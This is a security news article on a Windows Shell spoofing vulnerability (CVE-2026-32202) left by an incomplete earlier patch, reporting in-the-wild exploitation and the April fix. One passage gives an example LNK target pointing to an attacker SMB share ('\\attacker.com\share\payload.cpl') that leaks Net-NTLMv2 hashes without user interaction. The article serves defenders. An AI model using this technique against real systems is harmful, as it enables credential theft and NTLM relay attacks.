Windows Shell vulnerability is being attacked
In February, Microsoft closed a Windows Shell vulnerability, but incompletely. Attacks have now been discovered. A patch helps.
(Image: Skorzewiak / Shutterstock.com)
Microsoft fixed a security vulnerability in the Windows Shell on the February patch day – CVE-2026-21510, which was attacked in the wild by the cyber gang APT28 – better known as Fancy Bear. The patch was insufficient and left another security vulnerability. And that is now also being attacked on the internet.
Microsoft fixed the new vulnerability CVE-2026-32202 (CVSS 4.3, Risk "medium") on the April patch day with software patches. However, over the course of Monday, the developers updated the vulnerability entry: The spoofing vulnerability in the Windows Shell is therefore now also being exploited in the wild by malicious actors. The effects seem not to be as severe as before the insufficient patch from February.
Attackers can intercept some sensitive information, but cannot alter information or block resources. Microsoft further explains that a protection mechanism is not working correctly, allowing malicious actors to carry out spoofing attacks over the network. According to Microsoft, however, victims must execute a malicious file that attackers send them. Installing the update from the patch day protects against exploitation of the vulnerability.
Background on the vulnerability
Akamai has published a more detailed analysis in its blog. The IT analysts classify the new vulnerability as a zero-click vulnerability, unlike Microsoft. Victims' computers authenticate themselves to the attackers' server without user interaction. The original attack allowed the execution of malicious code from the network (RCE, Remote Code Execution). The first patch blocked unsigned or untrusted LNK files, which refer to CPL files, for example, using SmartScreen. However, the programmers overlooked a spot in the code path: The Windows Explorer tries to extract an icon from files like .lnk for the target file – .cpl. And here a path check takes place, including the connection to external SMB servers. This happens when displaying the directory, without further user clicks.
For example, the LNK file contains a shortcut to "\\attacker.com\share\payload.cpl", causing the computer to establish a connection to the SMB server "\\attacker.com\" when listing the directory and initiating an automatic NTLM authentication, thereby sending the victim computer's Net-NTLMv2 hash to the attackers. This can then be misused in NTLM relay attacks and for offline cracking, Akamai further explains.
Videos by heise
The heise security pro webinar „Securing Authentication in Active Directory: Surviving (and Thriving) with Microsoft's Outdated Concepts“ provides admins with guidance on security with in-depth explanations and background information on Net-NTLM.
(dmk)
